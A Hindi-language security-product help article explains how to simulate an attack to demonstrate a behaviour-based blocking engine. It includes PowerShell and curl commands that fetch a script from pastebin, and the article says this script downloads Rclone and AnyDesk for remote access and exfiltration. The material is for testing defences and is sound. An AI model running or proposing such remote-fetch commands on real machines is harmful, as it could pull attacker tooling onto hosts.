डायनामिक प्रिवेंशन एक व्यवहार-आधारित सुरक्षा इंजन है जो पता लगाए गए खतरों के जवाब में डायनामिक नियंत्रण लागू करके हमले की सतह को कम करता है और खतरे को जल्दी ही कम कर देता है, इससे पहले कि कोई प्रभाव हो। अधिक जानकारी के लिए, देखें डायनामिक प्रिवेंशन क्या है?
यह लेख एक वास्तविक-विश्व हमला परिदृश्य का अनुकरण करता है कि डायनामिक प्रिवेंशन आपके नेटवर्क को कैसे सुरक्षित करता है। इस उदाहरण में, एक उपयोगकर्ता पेस्टबिन से एक स्क्रिप्ट डाउनलोड करता है जिसका एक हमलावर उपयोग कर भविष्य के हमले को अंजाम देने के लिए अतिरिक्त उच्च-जोखिम टूल प्राप्त करने का प्रयास करता है। डायनामिक प्रिवेंशन हानिकारक व्यवहार की पहचान करता है और टूल को डाउनलोड होने से ब्लॉक कर देता है, इससे पहले कि हमला बढ़े या कोई प्रभाव हो।
इस हमले का जवाब पूरी तरह से स्वचालित है। कोई अतिरिक्त नियम आवश्यक नहीं हैं। सिर्फ डायनामिक प्रिवेंशन सक्षम करना हमले को रोकने के लिए पर्याप्त है।
इस हमले का अनुकरण करने के लिए:
- बिना अवरोधित हुए एक उच्च-जोखिम टूल डाउनलोड करें
- स्क्रिप्ट को पेस्टबिन से डाउनलोड करें
- उच्च-जोखिम टूल्स को फिर से डाउनलोड करने का प्रयास करें। इस बार, डाउनलोड अवरुद्ध कर दिया गया है।
यह दिखाने के लिए कि डायनामिक प्रिवेंशन केवल हानिकारक अनुक्रम का हिस्सा होने पर क्रियाओं को ब्लॉक करता है, पहले Rclone, फाइल प्रबंधन के लिए एक ओपन-सोर्स कमांड-लाइन टूल डाउनलोड करें। आक्रमणकारी आमतौर पर Rclone का उपयोग पोस्ट-कॉम्प्रोमाइज टूल के रूप में करते हैं क्योंकि यह वैध, शक्तिशाली है और सामान्य प्रशासनिक गतिविधि में घुलमिल जाता है।
Rclone को इनमें से किसी एक से डाउनलोड करें:
- निम्नलिखित URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
विंडोज उपकरणों पर:
- निम्नलिखित पावरशेल कमांड:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- निम्नलिखित पावरशेल कमांड:
-
macOS/Linux उपकरणों पर:
- निम्नलिखित टर्मिनल कमांड:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- निम्नलिखित टर्मिनल कमांड:
हमले की शुरुआत का अनुकरण करने के लिए, पेस्टबिन से एक स्क्रिप्ट डाउनलोड करें जो चलने पर, आम हमलावर उपकरण जैसे कि Rclone और AnyDesk रिमोट पहुंच और एक्सफिल्ट्रेशन के लिए डाउनलोड करता है।
स्क्रिप्ट को पेस्टबिन से डाउनलोड और चलाएँ:
-
विंडोज उपकरणों पर:
- निम्नलिखित पावरशेल कमांड:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- निम्नलिखित पावरशेल कमांड:
-
macOS/Linux उपकरणों पर:
- निम्नलिखित टर्मिनल कमांड:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- निम्नलिखित टर्मिनल कमांड:
स्क्रिप्ट चलती है और उपकरणों को डाउनलोड करती है। एक डायनामिक नियंत्रण को होस्ट पर लागू किया जाता है, जो खतरों के डैशबोर्ड में नियंत्रणों वाला होस्ट विजेट में दिखाया गया है। अधिक जानकारी के लिए, देखें सुरक्षा खतरों के डैशबोर्ड का उपयोग करना।
सिम्युलेटेड हमले में, हमलावर Rclone को डाउनलोड करने का प्रयास करता है। हालांकि, क्योंकि यह क्रिया पेस्टबिन से स्क्रिप्ट डाउनलोड करने की संदिग्ध गतिविधि के बाद है और एक नियंत्रण लागू होता है, डायनामिक प्रिवेंशन Rclone डाउनलोड को ब्लॉक कर देता है।
Rclone को इनमें से किसी एक से डाउनलोड करें:
- निम्नलिखित URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
विंडोज उपकरणों पर:
- निम्नलिखित पावरशेल कमांड:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- निम्नलिखित पावरशेल कमांड:
-
macOS/Linux उपकरणों पर:
- निम्नलिखित टर्मिनल कमांड:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- निम्नलिखित टर्मिनल कमांड:
इस फाइल का डाउनलोड नियंत्रण द्वारा अवरुद्ध किया गया है। शमन किए गए खतरे खतरों के डैशबोर्ड में होस्ट विथ Mitigated Threats विजेट में दिखाया जाता है।
0 टिप्पणियां
लेख टिप्पणियों के लिए उपलब्ध नहीं है.